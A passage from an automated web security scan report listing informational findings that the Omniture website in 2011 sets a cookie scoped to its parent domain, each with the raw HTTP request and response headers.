Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:39:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 05:39:21 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:39:21 GMT
Content-Length: 23937
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:39:21 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Press | Online Busines
...[SNIP]...

11.353. http://www.omniture.com/en/company/press_room/awards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/press_room/awards

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:40:05 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/company/press_room/awards HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:40:05 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:40:05 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:40:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:40:05 GMT; path=/; domain=omniture.com
Content-Length: 44076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Award-Winning Innovation | Web
...[SNIP]...

11.354. http://www.omniture.com/en/company/press_room/news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/press_room/news

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:39:47 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/company/press_room/news HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:39:47 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:39:47 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:39:47 GMT
Content-Length: 23629
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:39:47 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture in the News | Online B
...[SNIP]...

11.355. http://www.omniture.com/en/company/press_room/press_releases previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/press_room/press_releases

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:39:35 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/company/press_room/press_releases HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:39:35 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 05:39:35 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:39:35 GMT
Content-Length: 23061
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:39:35 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Press | Online Busines
...[SNIP]...

11.356. http://www.omniture.com/en/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/contact

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:45:56 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/contact HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:45:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 05:45:56 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:45:56 GMT
Content-Length: 23242
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:45:56 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Contact Omniture | Web Analytic
...[SNIP]...

11.357. http://www.omniture.com/en/contact/company previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/contact/company

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:48:56 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/contact/company HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:48:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 05:48:56 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:48:57 GMT
Content-Length: 21394
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:48:56 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Contact Omniture | Company Info
...[SNIP]...

11.358. http://www.omniture.com/en/contact/email previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/contact/email

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:48:34 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/contact/email HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:48:34 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 05:48:34 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:48:35 GMT
Content-Length: 22793
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:48:34 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Send Omniture an E-mail | Onlin
...[SNIP]...

11.359. http://www.omniture.com/en/contact/feedback previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/contact/feedback

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:46:02 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/contact/feedback HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:46:02 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 05:46:02 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:46:02 GMT
Content-Length: 21572
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:46:02 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Contact Omniture | Feedback</ti
...[SNIP]...

11.360. http://www.omniture.com/en/contact/offices previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/contact/offices

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:47:50 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/contact/offices HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:47:50 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 05:47:50 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:47:50 GMT
Content-Length: 26307
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:47:50 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Contact Omniture | Office locat
...[SNIP]...

11.361. http://www.omniture.com/en/contact/sales previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/contact/sales

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:46:05 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/contact/sales HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:46:05 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 05:46:05 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:46:05 GMT
Content-Length: 30936
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:46:05 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Request Information | Online Bu
...[SNIP]...

11.362. http://www.omniture.com/en/contact/support previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/contact/support

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:46:04 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/contact/support HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:46:04 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 05:46:04 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:46:04 GMT
Content-Length: 22748
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:46:04 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Contact Omniture | Support</tit
...[SNIP]...

11.363. http://www.omniture.com/en/education previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:05:27 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/education HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:05:27 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:05:27 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:05:27 GMT
Content-Length: 23085
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:05:27 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...

11.364. http://www.omniture.com/en/education/academic_initiative previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/academic_initiative

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:51 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/education/academic_initiative HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:11:51 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:11:51 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:11:52 GMT
Content-Length: 29263
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:51 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Education | Academic I
...[SNIP]...

11.365. http://www.omniture.com/en/education/certification previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:08:55 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/education/certification HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
